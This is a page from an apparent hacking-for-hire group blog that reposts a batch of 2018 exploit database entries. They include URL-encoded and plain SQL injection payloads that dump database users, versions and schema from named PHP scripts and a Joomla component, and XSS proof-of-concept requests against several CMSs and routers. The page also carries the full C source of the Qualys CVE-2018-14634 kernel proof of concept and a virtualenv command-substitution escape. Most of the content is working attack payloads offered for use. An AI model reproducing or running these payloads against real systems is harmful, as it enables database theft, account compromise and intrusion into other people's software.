Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863581389

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Exploit Title: Education Website 1.0 - 'subject' SQL Injection
# Dork: N/A
# Date: 2018-10-01
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://scriptzee.com/
# Software Link: http://scriptzee.com/products/details/34
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC: 
# http://localhost/[PATH]/college_list.html?subject=[SQL]

-7'+/*!11111UNION*/(/*!11111SELECT*/0x283129%2c0x283229%2c0x283329%2c0x283429%2c0x283529%2c0x283629%2c(Select+export_set(5,@:=0,(select+count(*)/*!11111from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2))%2c0x283829%2c0x283929%2c0x28313029%2c0x28313129%2c0x28313229%2c0x28313329%2c0x28313429%2c0x28313529%2c0x28313629%2c0x28313729%2c0x28313829%2c0x28313929%2c0x28323029%2c0x28323129%2c0x28323229%2c0x28323329%2c0x28323429%2c0x28323529%2c0x28323629%2c0x28323729%2c0x28323829%2c0x28323929%2c0x28333029%2c0x28333129%2c0x28333229%2c0x28333329%2c0x28333429%2c0x28333529%2c0x28333629%2c0x28333729%2c0x28333829%2c0x28333929%2c0x28343029%2c0x28343129%2c0x28343229%2c0x28343329%2c0x28343429%2c0x28343529%2c0x28343629%2c0x28343729%2c0x28343829%2c0x28343929%2c0x28353029)--+-
 
# http://localhost/[PATH]/college_list.html?city=[SQL]
 
'+/*!44444UNION*/(/*!44444SELECT*/0x283129%2c0x283229%2c0x283329%2c0x283429%2c0x283529%2c0x283629%2c(Select+export_set(5,@:=0,(select+count(*)/*!44444from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2))%2c0x283829%2c0x283929%2c0x28313029%2c0x28313129%2c0x28313229%2c0x28313329%2c0x28313429%2c0x28313529%2c0x28313629%2c0x28313729%2c0x28313829%2c0x28313929%2c0x28323029%2c0x28323129%2c0x28323229%2c0x28323329%2c0x28323429%2c0x28323529%2c0x28323629%2c0x28323729%2c0x28323829%2c0x28323929%2c0x28333029%2c0x28333129%2c0x28333229%2c0x28333329%2c0x28333429%2c0x28333529%2c0x28333629%2c0x28333729%2c0x28333829%2c0x28333929%2c0x28343029%2c0x28343129%2c0x28343229%2c0x28343329%2c0x28343429%2c0x28343529%2c0x28343629%2c0x28343729%2c0x28343829%2c0x28343929%2c0x28353029)--+-
 
# http://localhost/[PATH]/college_list.html?country=[SQL]
 
'+/*!22222UNION*/(/*!22222SELECT*/0x283129%2c0x283229%2c0x283329%2c0x283429%2c0x283529%2c0x283629%2c(select(select+concat(@:=0xa7,(select+count(*)from(information_schema.columns)where(@:=concat(@,0x3c6c693e,table_name,0x3a,column_name))),@)))%2c0x283829%2c0x283929%2c0x28313029%2c0x28313129%2c0x28313229%2c0x28313329%2c0x28313429%2c0x28313529%2c0x28313629%2c0x28313729%2c0x28313829%2c0x28313929%2c0x28323029%2c0x28323129%2c0x28323229%2c0x28323329%2c0x28323429%2c0x28323529%2c0x28323629%2c0x28323729%2c0x28323829%2c0x28323929%2c0x28333029%2c0x28333129%2c0x28333229%2c0x28333329%2c0x28333429%2c0x28333529%2c0x28333629%2c0x28333729%2c0x28333829%2c0x28333929%2c0x28343029%2c0x28343129%2c0x28343229%2c0x28343329%2c0x28343429%2c0x28343529%2c0x28343629%2c0x28343729%2c0x28343829%2c0x28343929%2c0x28353029)--+-
HireHackking 
# Exploit Title: Singleleg MLM Software 1.0 - 'msg_id' SQL Injection
# Dork: N/A
# Date: 2018-10-01
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://mlmsoftwarez.in/
# Software Link: http://mlmdemo.biz/singleleg/root.html
# Software Link: http://mlmdemo.biz/autopool/root.html
# Software Link: http://mlmdemo.biz/gift/root.html
# Software Link: http://mlmdemo.biz/investment/root.html
# Software Link: http://mlmdemo.biz/bidding/root.html
# Software Link: http://mlmdemo.biz/adclicking/root.html
# Software Link: http://mlmdemo.biz/repurchase/root.html
# Software Link: http://mlmdemo.biz/moneyorderplan/root.html
# Software Link: http://mlmdemo.biz/level/root.html
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# Affected Products: Singleleg MLM Software 1.0, Autopool MLM Software 1.0, Gift MLM Software 1.0
# Investmen MLM Software 1.0, Bidding MLM Software 1.0, ADD Clicking MLM Software 1.0
# Repurchase MLM Software 1.0, Moneyorder MLM Software 1.0, Level MLM Software 1.0
# CVE: N/A

# POC: 
# http://localhost/[PATH]/member/readmsg.php?msg_id=[SQL]

%2d%74%65%73%74%35%27%20%20%55%4e%49%4f%4e%28%53%45%4c%45%43%54%28%31%29%2c%28%32%29%2c%28%33%29%2c%28%34%29%2c%28%35%29%2c%28%36%29%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%28%38%29%2c%28%39%29%2c%28%31%30%29%2c%28%31%31%29%2c%28%31%32%29%2c%28%31%33%29%2c%28%31%34%29%2c%28%31%35%29%29%2d%2d%20%2d
HireHackking 
# Exploit Title: Flippa Marketplace Clone 1.0 - 'date_started' SQL Injection
# Dork: N/A
# Date: 2018-10-01
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://scriptzee.com/
# Software Link: http://scriptzee.com/products/details/15
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC: 
# http://localhost/[PATH]/site-search?sortBy=date_started[SQL]
 
%20%41%4e%44%20%45%58%54%52%41%43%54%56%41%4c%55%45%28%32%31%31%39%2c%43%4f%4e%43%41%54%28%30%78%35%63%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%36%36%3d%36%36%2c%31%29%29%29%29%29

# http://localhost/[PATH]/site-search?sortDir=desc[SQL]
 
%2c%28%53%45%4c%45%43%54%20%36%36%20%46%52%4f%4d%28%53%45%4c%45%43%54%20%43%4f%55%4e%54%28%2a%29%2c%43%4f%4e%43%41%54%28%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%36%36%3d%36%36%2c%31%29%29%29%2c%46%4c%4f%4f%52%28%52%41%4e%44%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%50%4c%55%47%49%4e%53%20%47%52%4f%55%50%20%42%59%20%78%29%61%29
HireHackking 
# Title: WUZHICMS 2.0 - Cross-Site Scripting 
# Author: Felipe "Renzi" Gabriel
# Date: 2018-10-01
# Vendor: http://www.wuzhicms.com
# Software: WUZHICMS 2.0
# CVE: CVE-2018-17832
 
# Technical Details & Description:
# A Cross Site Scripting vulnerability has been discovered in the WUZHICMS 2.0  web-application.
# The vulnerability is located in the 'v' and  'f' parameters of the`index.php` action GET method request.
   
# PoC

http://Target/index.php?v="><marquee><h1>RENZI</h1></marquee>

http://Target/index.php?f="><marquee><h1>RENZI</h1></marquee>
HireHackking 
# Exploit Title: Binary MLM Software 1.0 - 'pid' SQL Injection
# Dork: N/A
# Date: 2018-10-01
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://mlmsoftwarez.in/
# Software Link: http://mlmdemo.biz/binary/root.html
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC: 
# http://localhost/[PATH]/member/tree.php?pid=[SQL]

%2d%74%65%73%74%35%27%20%20%55%4e%49%4f%4e%28%53%45%4c%45%43%54%28%31%29%2c%28%32%29%2c%28%33%29%2c%28%34%29%2c%28%35%29%2c%28%36%29%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%28%38%29%2c%28%39%29%2c%28%31%30%29%2c%28%31%31%29%2c%28%31%32%29%2c%28%31%33%29%2c%28%31%34%29%2c%28%31%35%29%29%2d%2d%20%2d
HireHackking 
/*
EDB-Note: Systems with less than 32GB of RAM are unlikely to be affected by this issue, due to memory demands during exploitation.
EDB Note: poc-exploit.c 
*/

/*
 * poc-exploit.c for CVE-2018-14634
 * Copyright (C) 2018 Qualys, Inc.
 *
 * This program is free software: you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation, either version 3 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program.  If not, see <http://www.gnu.org/licenses/>.
 */

#include <limits.h>
#include <paths.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/resource.h>
#include <sys/stat.h>
#include <sys/time.h>
#include <sys/types.h>
#include <unistd.h>

#define MAPCOUNT_ELF_CORE_MARGIN        (5)
#define DEFAULT_MAX_MAP_COUNT   (USHRT_MAX - MAPCOUNT_ELF_CORE_MARGIN)

#define PAGESZ ((size_t)4096)
#define MAX_ARG_STRLEN ((size_t)128 << 10)
#define MAX_ARG_STRINGS ((size_t)0x7FFFFFFF)

#define die() do { \
    fprintf(stderr, "died in %s: %u\n", __func__, __LINE__); \
    exit(EXIT_FAILURE); \
} while (0)

int
main(void)
{
    if (sizeof(size_t) != sizeof(uint64_t)) die();
    const size_t alpha = 512;
    const size_t sprand = 8192;
    const size_t beta = (size_t)9 << 10;
    const size_t items = (size_t)1 << 31;
    const size_t offset = items * sizeof(uintptr_t);

    #define LLP "LD_LIBRARY_PATH=."
    static char preload_env[MAX_ARG_STRLEN];
  {
    char * const sp = stpcpy(preload_env, "LD_PRELOAD=");
    char * cp = preload_env + sizeof(preload_env);
    size_t n;
    for (n = 1; n <= (size_t)(cp - sp) / sizeof(LLP); n++) {
        size_t i;
        for (i = n; i; i--) {
            *--cp = (n == 1) ? '\0' : (i == n) ? ':' : '0';
            cp -= sizeof(LLP)-1;
            memcpy(cp, LLP, sizeof(LLP)-1);
        }
    }
    memset(sp, ':', (size_t)(cp - sp));
    if (memchr(preload_env, '\0', sizeof(preload_env)) !=
                    preload_env + sizeof(preload_env)-1) die();
  }
    const char * const protect_envp[] = {
        preload_env,
    };
    const size_t protect_envc = sizeof(protect_envp) / sizeof(protect_envp[0]);
    size_t _protect_envsz = 0;
  {
    size_t i;
    for (i = 0; i < protect_envc; i++) {
        _protect_envsz += strlen(protect_envp[i]) + 1;
    }
  }
    const size_t protect_envsz = _protect_envsz;

    const size_t scratch_envsz = (size_t)1 << 20;
    const size_t scratch_envc = scratch_envsz / MAX_ARG_STRLEN;
    if (scratch_envsz % MAX_ARG_STRLEN) die();
    static char scratch_env[MAX_ARG_STRLEN];
    memset(scratch_env, ' ', sizeof(scratch_env)-1);

    const size_t onebyte_envsz = (size_t)256 << 10;
    const size_t onebyte_envc = onebyte_envsz / 1;

    const size_t padding_envsz = offset + alpha;
    /***/ size_t padding_env_rem = padding_envsz % MAX_ARG_STRLEN;
    const size_t padding_envc = padding_envsz / MAX_ARG_STRLEN + !!padding_env_rem;
    static char padding_env[MAX_ARG_STRLEN];
    memset(padding_env, ' ', sizeof(padding_env)-1);
    static char padding_env1[MAX_ARG_STRLEN];
    if (padding_env_rem) memset(padding_env1, ' ', padding_env_rem-1);

    const size_t envc = protect_envc + scratch_envc + onebyte_envc + padding_envc;
    if (envc > MAX_ARG_STRINGS) die();

    const size_t argc = items - (1 + 1 + envc + 1);
    if (argc > MAX_ARG_STRINGS) die();

    const char * const protect_argv[] = {
        "./poc-suidbin",
    };
    const size_t protect_argc = sizeof(protect_argv) / sizeof(protect_argv[0]);
    if (protect_argc >= argc) die();
    size_t _protect_argsz = 0;
  {
    size_t i;
    for (i = 0; i < protect_argc; i++) {
        _protect_argsz += strlen(protect_argv[i]) + 1;
    }
  }
    const size_t protect_argsz = _protect_argsz;

    const size_t padding_argc = argc - protect_argc;
    const size_t padding_argsz = (offset - beta) - (alpha + sprand / 2 +
                   protect_argsz + protect_envsz + scratch_envsz + onebyte_envsz / 2);
    const size_t padding_arg_len = padding_argsz / padding_argc;
    /***/ size_t padding_arg_rem = padding_argsz % padding_argc;
    if (padding_arg_len >= MAX_ARG_STRLEN) die();
    if (padding_arg_len < 1) die();
    static char padding_arg[MAX_ARG_STRLEN];
    memset(padding_arg, ' ', padding_arg_len-1);
    static char padding_arg1[MAX_ARG_STRLEN];
    memset(padding_arg1, ' ', padding_arg_len);

    const char ** const envp = calloc(envc + 1, sizeof(char *));
    if (!envp) die();
  {
    size_t envi = 0;
    size_t i;
    for (i = 0; i < protect_envc; i++) {
        envp[envi++] = protect_envp[i];
    }
    for (i = 0; i < scratch_envc; i++) {
        envp[envi++] = scratch_env;
    }
    for (i = 0; i < onebyte_envc; i++) {
        envp[envi++] = "";
    }
    for (i = 0; i < padding_envc; i++) {
        if (padding_env_rem) {
            envp[envi++] = padding_env1;
            padding_env_rem = 0;
        } else {
            envp[envi++] = padding_env;
        }
    }
    if (envi != envc) die();
    if (envp[envc] != NULL) die();
    if (padding_env_rem) die();
  }

    const size_t filemap_size = ((padding_argc - padding_arg_rem) * sizeof(char *) / (DEFAULT_MAX_MAP_COUNT / 2) + PAGESZ-1) & ~(PAGESZ-1);
    const size_t filemap_nptr = filemap_size / sizeof(char *);
    char filemap_name[] = _PATH_TMP "argv.XXXXXX";
    const int filemap_fd = mkstemp(filemap_name);
    if (filemap_fd <= -1) die();
    if (unlink(filemap_name)) die();
  {
    size_t i;
    for (i = 0; i < filemap_nptr; i++) {
        const char * const ptr = padding_arg;
        if (write(filemap_fd, &ptr, sizeof(ptr)) != (ssize_t)sizeof(ptr)) die();
    }
  }
  {
    struct stat st;
    if (fstat(filemap_fd, &st)) die();
    if ((size_t)st.st_size != filemap_size) die();
  }

    const char ** const argv = mmap(NULL, (argc + 1) * sizeof(char *), PROT_READ, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (argv == MAP_FAILED) die();
    if (protect_argc > PAGESZ / sizeof(char *)) die();
    if (mmap(argv, PAGESZ, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0) != argv) die();
  {
    size_t argi = 0;
  {
    size_t i;
    for (i = 0; i < protect_argc; i++) {
        argv[argi++] = protect_argv[i];
    }
  }
  {
    size_t n = padding_argc;
    while (n) {
        void * const argp = &argv[argi];
        if (((uintptr_t)argp & (PAGESZ-1)) == 0) {
            if (padding_arg_rem || n < filemap_nptr) {
                if (mmap(argp, PAGESZ, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0) != argp) die();
            } else {
                if (mmap(argp, filemap_size, PROT_READ, MAP_FIXED | MAP_PRIVATE, filemap_fd, 0) != argp) die();
                argi += filemap_nptr;
                n -= filemap_nptr;
                continue;
            }
        }
        if (padding_arg_rem) {
            argv[argi++] = padding_arg1;
            padding_arg_rem--;
        } else {
            argv[argi++] = padding_arg;
        }
        n--;
    }
  }
    if (argi != argc) die();
    if (argv[argc] != NULL) die();
    if (padding_arg_rem) die();
  }

  {
    static const struct rlimit stack_limit = {
        .rlim_cur = RLIM_INFINITY,
        .rlim_max = RLIM_INFINITY,
    };
    if (setrlimit(RLIMIT_STACK, &stack_limit)) die();
  }
    execve(argv[0], (char * const *)argv, (char * const *)envp);
    die();
}

/*
EDB Note: EOF poc-exploit.c 
*/




/*
EDB Note: poc-suidbin.c
*/


/*
 * poc-suidbin.c for CVE-2018-14634
 * Copyright (C) 2018 Qualys, Inc.
 *
 * This program is free software: you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation, either version 3 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program.  If not, see <http://www.gnu.org/licenses/>.
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define die() do { \
    fprintf(stderr, "died in %s: %u\n", __func__, __LINE__); \
    exit(EXIT_FAILURE); \
} while (0)

int
main(const int argc, const char * const * const argv, const char * const * const envp)
{
    printf("argc %d\n", argc);

    char stack = '\0';
    printf("stack %p < %p < %p < %p < %p\n", &stack, argv, envp, *argv, *envp);

    #define LLP "LD_LIBRARY_PATH"
    const char * const llp = getenv(LLP);
    printf("getenv %p %s\n", llp, llp);

    const char * const * env;
    for (env = envp; *env; env++) {
        if (!strncmp(*env, LLP, sizeof(LLP)-1)) {
            printf("%p %s\n", *env, *env);
        }
    }
    exit(EXIT_SUCCESS);
}

/*
EDB Note: EOF poc-suidbin.c
*/
HireHackking 
# Exploit Title: Billion ADSL Router 400G 20151105641 - Cross-Site Scripting
# Author: Cakes
# Discovery Date: 2018-09-30
# Vendor Homepage: http://www.billion.com
# Software Link: http://billionfirmware.co.za
# Tested Version: 20151105641
# Tested on OS: Kali Linux
# CVE: N/A

# Description:
# Improper input validation on the  router web interface allows attackers add a persistent 
# Cross-Site scripting attack on the IP Interface field when adding a new static route. 
# Simply intercept a new static route request and add in the XSS

# Poc

POST /configuration/edit-list.html HTTP/1.1
Host: Target
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://Target/configuration/edit-list.html
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 93

nodename=&destination=0.0.0.0&netmask=0.0.0.0&gateway=0.0.0.1&interface=<script>alert("Cakes");</script>&cost=1&action=create
HireHackking 
# Exploit Title: OPAC EasyWeb Five 5.7 - 'nome' SQL Injection
# Dork: N/A
# Exploit Author: Ihsan Sencan
# Date: 2018-10-02
# Vendor Homepage: http://www.nexusfi.it/
# Software Link: http://www.nexusfi.it/easyweb.php
# Version: 5.7
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC: 
# 1)
# POST /easyweb/w7008/index.php?scelta=cerca_biblio&&opac=w7008 HTTP/1.1

nome=') UNION ALL SELECT NULL,NULL,NULL,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
 
nome=') AND ROW(3,6)>(SELECT COUNT(*),CONCAT(CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(SELECT (ELT(66=66,1))),FLOOR(RAND(0)*2))x FROM (SELECT 66 UNION SELECT 7030 UNION SELECT 4751 UNION SELECT 1310)a GROUP BY x)-- Efe


http://Target/easyweb/w7008/index.php?scelta=cerca_biblio&&opac=w7008
nome=') UNION ALL SELECT NULL,NULL,NULL,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
HireHackking 
# Exploit Title: OPAC EasyWeb Five 5.7 - 'biblio' SQL Injection
# Dork: inurl:"index.php?scelta=campi"
# Date: 2018-10-02
# Exploit Author: Dino Barlattani
# Vendor Homepage: http://www.nexusfi.it/
# Software Link: http://www.nexusfi.it/easyweb.php
# Version: 5.7
# Category: Webapps
# Platform: PHP
# CVE: N/A

# POC:
# http://(server ip)/easyweb/w2001/index.php?scelta=campi&&biblio=RT10AH[SQL]&lang=

# You can use sqlmap for dump entire database and dumping hash

scelta=campi&&biblio=RT10AH' AND ROW(3677,8383)>(SELECT
COUNT(*),CONCAT(0x7176627a71,(SELECT
(ELT(3677=3677,1))),0x71767a7a71,FLOOR(RAND(0)*2))x FROM (SELECT 8278 UNION
SELECT 2746 UNION SELECT 1668 UNION SELECT 1526)a GROUP BY x) AND
'CrYc'='CrYc&lang=
HireHackking 
# Exploit Title: Coaster CMS 5.5.0 - Cross-Site Scripting
# Date: 2018-10-01
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://www.web-feet.co.uk/
# Software Link : https://github.com/Web-Feet/coastercms
# Software : Coaster CMS
# Product Version: v5.5.0
# Vulernability Type : Cross-site Scripting
# Vulenrability : Stored XSS
# CVE : N/A

# A Stored XSS vulnerability has been discovered in the v5.5.0 version of the Coaster CMS product.

# HTTP POST Request :

POST /admin/pages/edit/26 HTTP/1.1
Host: demo.coastercms.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://demo.coastercms.org/admin/pages/edit/26
Content-Type: multipart/form-data; boundary=---------------------------24464570528145
Content-Length: 3353
Cookie: __cfduid=ddc0ae999f19fa783083ea0c7fdce0ba41538397617; XSRF-TOKEN=eyJpdiI6IndLeTBrZVwvWkdzUE9JSTArU3FOQ3BRPT0iLCJ2YWx1ZSI6InlsZ3Jib0ZNQTM3TXZEZGlwd0hJZmg1aHRibGZDWHZTcmordkRKbnRHWVVjYUJ4TlFOSGdYNkFIWHBSdlozUlY1c3ZJQjNuek9tOW92WXE5SkloOHZ3PT0iLCJtYWMiOiI0MzkzZjU1YWNiNDU2MDhkMDVhMDMwZDkwZTNhZjc4NGI5YzMzZjk0N2Q4YmJmYzY3NWZlZjg1MzVjYTJmMWY2In0%3D; laravel_session=eyJpdiI6IkNhM0Roc280SjE2aFcweXlcLzZwR2hRPT0iLCJ2YWx1ZSI6IldoUG9xTnNqRjh2TlBrQW51NlhqU1hCa3NIZmhSczFlYWE5Mkxza3dMWThkbFZcL2E1VmVTRExCa3h2ckMrdDliajZSTjRSUnhQcEJiek1pSjZ6VGRyZz09IiwibWFjIjoiMmQ0YjBkMmY1NDQ4ODdjOWVhZWUyMDFkY2UwMTlkNTM4ZmEyMGE4YjAwMDVkYmQ3ODZiZWUyOWM4OWQzODg4ZSJ9
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------24464570528145
Content-Disposition: form-data; name="_token"

ZeLPiM6IJlkjRf0tosDFjMNPOXVsPv5YioF6092P
-----------------------------24464570528145
Content-Disposition: form-data; name="block[19]"


-----------------------------24464570528145
Content-Disposition: form-data; name="block[20]"


-----------------------------24464570528145
Content-Disposition: form-data; name="block[21]"


-----------------------------24464570528145
Content-Disposition: form-data; name="block[34]"

Search
-----------------------------24464570528145
Content-Disposition: form-data; name="block[36]"


-----------------------------24464570528145
Content-Disposition: form-data; name="block[33]"

<p>"><img src=x onerror=alert("ismailtasdelen")>
<script>alert("Ismail Tasdelen")</script>
</p>
-----------------------------24464570528145
Content-Disposition: form-data; name="block[1][exists]"

1
-----------------------------24464570528145
Content-Disposition: form-data; name="block[1][select]"

posts
-----------------------------24464570528145
Content-Disposition: form-data; name="publish"

publish
-----------------------------24464570528145
Content-Disposition: form-data; name="block[35][source]"


-----------------------------24464570528145
Content-Disposition: form-data; name="block[35][alt]"


-----------------------------24464570528145
Content-Disposition: form-data; name="page_info[parent]"

0
-----------------------------24464570528145
Content-Disposition: form-data; name="page_info_lang[name]"

Search
-----------------------------24464570528145
Content-Disposition: form-data; name="page_info_lang[url]"

search
-----------------------------24464570528145
Content-Disposition: form-data; name="page_info[link]"

0
-----------------------------24464570528145
Content-Disposition: form-data; name="page_info_other[group_radio]"

0
-----------------------------24464570528145
Content-Disposition: form-data; name="page_info[group_container]"

0
-----------------------------24464570528145
Content-Disposition: form-data; name="page_info[group_container_url_priority]"

0
-----------------------------24464570528145
Content-Disposition: form-data; name="page_info[template][exists]"

1
-----------------------------24464570528145
Content-Disposition: form-data; name="page_info[template][select]"

3
-----------------------------24464570528145
Content-Disposition: form-data; name="page_info[live][exists]"

1
-----------------------------24464570528145
Content-Disposition: form-data; name="page_info[live][select]"

1
-----------------------------24464570528145
Content-Disposition: form-data; name="page_info[live_start]"


-----------------------------24464570528145
Content-Disposition: form-data; name="page_info[live_end]"


-----------------------------24464570528145
Content-Disposition: form-data; name="page_info[sitemap][exists]"

1
-----------------------------24464570528145
Content-Disposition: form-data; name="page_info[sitemap][select]"

1
-----------------------------24464570528145
Content-Disposition: form-data; name="versionFrom"

4
-----------------------------24464570528145
Content-Disposition: form-data; name="duplicate"

0
-----------------------------24464570528145--
HireHackking 
# Exploit Title: Zechat 1.5 - 'uname' SQL Injection
# Exploit Author: Ihsan Sencan
# Date: 2018-10-02
# Dork: N/A
# Vendor Homepage: https://bylancer.com/
# Software Link: https://bylancer.com/products/zechat-php-script/index.php
# Version: 1.5
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC: 
# 1)

https://Target/products/zechat-php-script/profile.php?uname=demo

'+UNION(SELECT+0x283129,0x283229,0x283329,0x283429,0x283529,0x283629,0x283729,0x283829,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529,0x28313629,0x28313729,0x28313829,0x28313929,0x28323029,0x28323129,0x28323229)--+-
HireHackking 
# Exploit Title: Joomla! Component Jimtawl 2.2.7 - 'id' SQL Injection
# Exploit Author: Ihsan Sencan
# Dork: N/A
# Date: 2018-10-03
# Vendor Homepage: https://janguo.de/
# Software Link: https://extensions.joomla.org/extensions/extension/vertical-markets/thematic-directory/collection-factory/
# Software Download: https://vd.janguo.de/attachments/download/191/pkg_jimtawl-2.2.8-current-r569.zip
# Version: 2.2.7
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: NA

# POC: 
# 1)
# http://localhost/[PATH]/index.php?option=com_jimtawl&view=user&task=user.edit&id=[SQL]

' AND EXTRACTVALUE(66,CONCAT(0x5c,(SELECT (ELT(66=66,1))),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION())))-- VerAyari
HireHackking 
# Exploit Title: Airties AIR5342 1.0.0.18 - Cross-Site Scripting
# Date: 25-09-2018
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: [https://www.airties.com/]
# Software [http://www.airties.com.tr/support/dcenter/]
# Version: [1.0.0.18]
# Affected products: AIR5342, AIR5343v2, AIR5443v2, AIR5453, AIR5442, AIR5750, AIR5650, AIR5021
# Tested on: MacOS High Sierra / Linux Mint / Windows 10
# CVE : CVE-2018-17593, CVE-2018-17590, CVE-2018-17591, CVE-2018-17588, CVE-2018-17587
  
# A cross site scripting vulnerability has been discovered in the AIR5342 modem of the AirTies manufacturer. 
# AirTies Air 5342 devices have XSS via the top.html productboardtype parameter.  
  
# HTTP Requests :

GET /top.html?page=main&productboardtype=%3Cscript%3Ealert(%22Ismail%20Tasdelen%22);%3C/script%3E HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
HireHackking 
# Exploit Title: virtualenv 16.0.0 - Sandbox Escape
# Date: 2018-10-02
# Exploit Author: vr_system
# Vendor Homepage: https://virtualenv.pypa.io/en/stable/
# Software Link: https://virtualenv.pypa.io/en/stable/
# Version: 16.0.0
# Tested on: kali linux
# CVE : CVE-2018-17793

# 1 Install
# root@kali:~#pip install virtualenv
# root@kali:~#virtualenv test_env
# root@kali:~#cd test_env/
# root@kali:~/test_env#source ./bin/activate

# 2 Sandbox escape

(test_env) root@kali:~/test_env#python $(bash >&2)
(test_env) root@kali:~/test_env#python $(rbash >&2)
HireHackking 
